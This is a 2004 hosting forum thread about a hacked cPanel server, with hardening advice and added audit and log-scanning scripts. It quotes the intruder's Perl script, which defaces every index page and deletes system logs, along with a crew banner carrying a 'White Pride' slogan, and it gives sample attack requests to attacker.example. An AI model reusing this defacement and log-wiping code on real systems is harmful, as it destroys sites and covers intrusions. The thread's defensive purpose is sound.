The Community Forums


Server hacked by little piss-ants

Discussion in 'General Discussion' started by bmcpanel, Apr 15, 2004.

  1. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    Just wanted to let everyone know that one of my Cpanel servers has been hacked. I have not had a successful hack in over a year. I keep everything updated. Wish I knew what the hell happened.

    The intruder was an amateur. They were very noisy. They removed the entire /usr/local/apache/logs folder which caused httpd to be unable to restart which alerted me that there was a problem. What a dip-shit this guy was.

    Anyway, I am restoring os. have previous backups. no problem, just inconvenient.

    I am sensing an increase in hacks, though, of Cpanel servers according to posts on this forum. Does anyone else sense an increase?
     
  2. beebware

    beebware Active Member

    Joined:
    Aug 2, 2003
    Messages:
    34
    Likes Received:
    0
    Trophy Points:
    6
    I've not really seen an increase of substantiated hack reports (i.e. servers secured by "people who at least have a clue what they are doing": of course, the number of servers 'hacked' that weren't anywhere near secured in the first place stays high...) - but how did they get into your server?
     
  3. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    I have firewall, latest software patches (always), latest Cpanel update, per IP login for SSH for trusted users only (about a half dozen people), etc., etc., etc.

    I don't know how they got in since they completely removed the log files (friggin amateurs).

    They defaced all index pages on the server. Here is the script they used.

    -------
    #!/usr/local/perl/bin
    system("find / index.* >> caxe.txt");
    system("find / home.* >> caxe.txt");
    system("find / default.* >> caxe.txt");
    my @dir;
    open(caxe,"<caxe.txt");
    while(<caxe>)
    {
    $dir[$a] = $_;
    chomp $dir[$a];
    $a++;
    $b++;
    }
    for($a=0;$a<=$b;$a++)
    {
    $texto = 'SpyKids 2004';
    system("echo $texto > $dir[$a]");
    }
     
  4. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    Cancer v0.01 For Unix |
    | |
    | - System By R0NiN - |
    | - Coded By Malloc - |
    | |
    | PsychoPhobia n` Aneurism Crew |
    | |
    | * White Pride *
     
  5. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    system("rm -fr /root/.bash* 2> /dev/null");
    system("rm -fr /var/log/messages 2> /dev/null");
    system("rm -fr /var/log/secure 2> /dev/null");
    system("rm -fr /var/log/lastlog 2> /dev/null");
    system("rm -fr /var/log/wtmp 2> /dev/null");
    system("rm -fr /var/log/httpd/access_log 2> /dev/null");
    system("rm -fr /var/log/httpd/error_log 2> /dev/null");
    system("rm -rf /var/adm 2> /dev/null");
    system("rm -rf /usr/local/apache/logs 2> /dev/null");
    system("rm -rf /var/log/mysql 2> /dev/null");
    print "\nLogs apagados\n";
    open(arquivo,">caxe");
    print arquivo "";
    close(arquivo);
    open(arquivo,">caxe1");
    print arquivo "";
    close(arquivo);
     
  6. Website Rob

    Website Rob Well-Known Member

    Joined:
    Mar 23, 2002
    Messages:
    1,506
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    Alberta, Canada
    cPanel Access Level:
    Root Administrator
    bmcpanel, can you provide information on the following:

    - is tmp its own partition and what method was used to secure it

    - do you run PHP in safe_mode

    - have you disabled PHP open_basedir

    Most all cracks I have seen involved insecure PHP scripts and/or settings, although, this one seems to have been through Perl.
     
  7. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    Still, that alone doesn't give you root access. To be able to delete all those files they must have become root.

    bmcpanel, you were running the latest kernel I assume?
     
  8. phpman

    phpman Well-Known Member

    Joined:
    Sep 3, 2003
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Rio de Janeiro - Brazil
    small suggestion:

    In Firewall:

    # Common ingress (inbound) TCP ports
    IG_TCP_CPORTS="21,22,25,26,37,53,80,110,143,443,465,1040,2082,2083,2086,2087,2095,2096,3050,3306"

    #
    # Common ingress (inbound) UDP ports
    IG_UDP_CPORTS="37,53,873"


    In WHM:

    - Click on the option 'Background Process Killer' and mark ALL the users
    - Click on the option 'Allow cPanel users to reset their password via email' and disable it


    In Shell:

    1) Protect Php Scripts

    pico -w /etc/php.ini
    pico -w /usr/lib/php.ini
    pico -w /usr/local/lib/php.ini
    pico -w /usr/local/cpanel/3rdparty/etc/php.ini
    pico -w /usr/local/cpanel/3rdparty/lib/php.ini

    Search for the line 'disable_functions' and change it to: 'disable_functions = shell_exec, shell_exec, system'


    2) Protect php.ini

    chattr +i /etc/php.ini
    chattr +i /usr/lib/php.ini
    chattr +i /usr/local/lib/php.ini
    chattr +i /usr/local/cpanel/3rdparty/etc/php.ini
    chattr +i /usr/local/cpanel/3rdparty/lib/php.ini


    3) Disable Telnet

    pico -w /etc/xinetd.d/telnet

    change the line 'disable = no' to 'disable = yes'

    /etc/init.d/xinetd restart


    4) Secure TMP

    /scripts/securetmp


    See topic: http://forum.rackshack.net/showthread.php?threadid=30333&highlight=secure+your+box


    Hug
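A way to check that steps 1 and 2 above actually took effect on a server, as an added example that is not part of phpman's post: it reads each php.ini path the post lists, parses the active disable_functions directive, and asks lsattr whether the file carries the chattr +i flag. The function list is an assumption that extends the post's 'shell_exec, system' with the other PHP process-spawning functions.

```python
"""Audit the php.ini hardening from the post above (added example, not from the
thread). Paths are the post's; the function list extends its 'shell_exec, system'."""
import os
import shutil
import subprocess

PHP_INI_PATHS = [
    "/etc/php.ini",
    "/usr/lib/php.ini",
    "/usr/local/lib/php.ini",
    "/usr/local/cpanel/3rdparty/etc/php.ini",
    "/usr/local/cpanel/3rdparty/lib/php.ini",
]
# Assumed list: the PHP functions a defacement script like the one posted relies on.
REQUIRED_DISABLED = {"exec", "shell_exec", "system", "passthru", "popen", "proc_open"}


def parsed_disable_functions(ini_text):
    """Names in the last active disable_functions directive (later wins, as in PHP)."""
    found = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts a comment in php.ini
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key == "disable_functions":
            found = {n.strip() for n in value.strip('"').split(",") if n.strip()}
    return found


def missing_disabled(ini_text, required=REQUIRED_DISABLED):
    """Sorted names from `required` that the ini text leaves enabled."""
    return sorted(required - parsed_disable_functions(ini_text))


def is_immutable(path):
    """True if lsattr shows the chattr +i flag; None when lsattr is unavailable."""
    if shutil.which("lsattr") is None:
        return None
    out = subprocess.run(["lsattr", path], capture_output=True, text=True)
    return out.returncode == 0 and "i" in (out.stdout.split() or [""])[0]


if __name__ == "__main__":
    for path in PHP_INI_PATHS:
        if not os.path.exists(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            gaps = missing_disabled(fh.read())
        print(f"{path}: still enabled={gaps or 'none'} immutable={is_immutable(path)}")
```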
     
  9. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    hi

    Hi,

    Doing this

    1) Protect Php Scripts

    pico -w /etc/php.ini
    pico -w /usr/lib/php.ini
    pico -w /usr/local/lib/php.ini
    pico -w /usr/local/cpanel/3rdparty/etc/php.ini
    pico -w /usr/local/cpanel/3rdparty/lib/php.ini

    Search for line: 'disable_functions' alter for: 'disable_functions = shell_exec, shell_exec, system'


    2) Protect php.ini

    chattr +i /etc/php.ini
    chattr +i /usr/lib/php.ini
    chattr +i /usr/local/lib/php.ini
    chattr +i /usr/local/cpanel/3rdparty/etc/php.ini
    chattr +i /usr/local/cpanel/3rdparty/lib/php.ini



    Won't this cause any other problems with users' scripts? Please let me know.
     
  10. LS_Drew

    LS_Drew Well-Known Member

    Joined:
    Feb 20, 2003
    Messages:
    187
    Likes Received:
    0
    Trophy Points:
    16
    If it does, then the user was doing something they shouldn't have been able to do in the first place.
     
  11. phpman

    phpman Well-Known Member

    Joined:
    Sep 3, 2003
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Rio de Janeiro - Brazil
    Hello

    This procedure blocks shell functions through PHP, which are very dangerous: a user with a simple bug in PHPNUKE can attack your server, and through an open include directory in Oscommerce the 'hacker' can steal the whole database and more...

    Usually only scripts that use shell functions, which is highly inadvisable, would be affected; I haven't had any other problem.

    I have 17 servers, an average of 12mil domains, and none of them was affected.
     
  12. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    I can't put a finger on it, but I am thinking this crack came through a PHP script.... probably a forum. Can't prove it, but I suspect it.
     
  13. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    Yes
     
  14. phpman

    phpman Well-Known Member

    Joined:
    Sep 3, 2003
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Rio de Janeiro - Brazil
    Secure your TMP

    /scripts/securetmp

    Easy !!!!!
     
  15. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    I doubt that would have stopped them anyway. It's very easy to still execute programs in a 'noexec' tmp directory.

    I am curious how they got root though if everything including kernel was up to date. New exploit?
     
  16. phpman

    phpman Well-Known Member

    Joined:
    Sep 3, 2003
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Rio de Janeiro - Brazil
    Probably
     
  17. ElrondBCN

    ElrondBCN Active Member

    Joined:
    May 19, 2003
    Messages:
    35
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Boston, MA USA
    Mine was hacked yesterday as well. A new index.html file was placed in the public_html directory of the main account on the server. Since the old index file was index.php, it made our homepage change to something by TechTeam.

    I am still not sure as to how they got in to do this. Latest kernel and all CPanel updates. This was our first hack in 18 months. My best guess is something with PHP as well. I disabled those functions and ran /scripts/securetmp but I'm not sure if that's how they got in.

    Any clues as to how I can go about tracking down how this file was placed into that directory? Moreover, how can I tell if my MySQL db information was stolen or other website files?
     
  18. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    What OS and what kernel exactly are you running?
    Did you compile apache with PHPsuexec?

    You could grep the domain logs for commands like wget, maybe this will help you find the exploitable script.


    Code:
    for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
     
    #18 jamesbond, Apr 23, 2004
    Last edited: Apr 23, 2004
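A scanner that generalises the grep above, as an added example that is not from jamesbond's post: it parses Apache combined-format domlog lines, URL-decodes the request, and flags both downloader names (wget, curl, fetch, lynx) and a remote URL passed in a query parameter, the open-include pattern mentioned earlier in the thread. The log lines and host names are constructed for the example.

```python
"""Scan Apache domlogs for downloader commands or remote URLs in query strings.
Added example, not from the thread; sample lines below are constructed."""
import re
import sys
from urllib.parse import unquote

# Apache combined log format: ip ident user [time] "request" status bytes ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')
DOWNLOADERS = re.compile(r"\b(wget|curl|fetch|lynx)\b", re.IGNORECASE)
REMOTE_URL_IN_QUERY = re.compile(r"[?&][^=&]+=(https?|ftp)://", re.IGNORECASE)


def suspicious_request(line):
    """Return (ip, indicator, decoded request) or None for a clean line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote(m.group("req"))  # payloads are often %-encoded in the log
    if REMOTE_URL_IN_QUERY.search(decoded):
        return m.group("ip"), "remote-url-in-query", decoded
    hit = DOWNLOADERS.search(decoded)
    if hit:
        return m.group("ip"), hit.group(1).lower(), decoded
    return None


def scan(lines):
    """All suspicious hits from an iterable of log lines, in order."""
    return [hit for hit in map(suspicious_request, lines) if hit]


# Constructed sample lines: a normal page view, a remote-include attempt, and a
# %-encoded command that calls a downloader. IPs and hosts are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Apr/2004:10:01:02 -0500] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.9 - - [23/Apr/2004:10:03:17 -0500] "GET /shop/includes/x.php?include_dir=http://attacker.example/c.txt HTTP/1.1" 200 812',
    '198.51.100.9 - - [23/Apr/2004:10:03:40 -0500] "GET /x.php?cmd=wget%20http://attacker.example/k HTTP/1.1" 200 14',
]

if __name__ == "__main__":
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG
    for ip, indicator, req in scan(source):
        print(f"{ip}\t{indicator}\t{req}")
```

Run it with a domlog path as the first argument (for example one file from /usr/local/apache/domlogs/) to scan a real log instead of the sample lines.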
  19. BeerUser

    BeerUser Active Member

    Joined:
    Apr 16, 2004
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    Re: hi

    My php.ini is /usr/local/lib/php.ini.
    I did pico -w /usr/local/lib/php.ini
    and put in shell_exec, shell_exec, system.
    One thing: doesn't WHM/cPanel use these functions?
     
  20. phpman

    phpman Well-Known Member

    Joined:
    Sep 3, 2003
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Rio de Janeiro - Brazil
    cPanel and WHM don't use these functions; usually hardly any legitimate application uses them.
     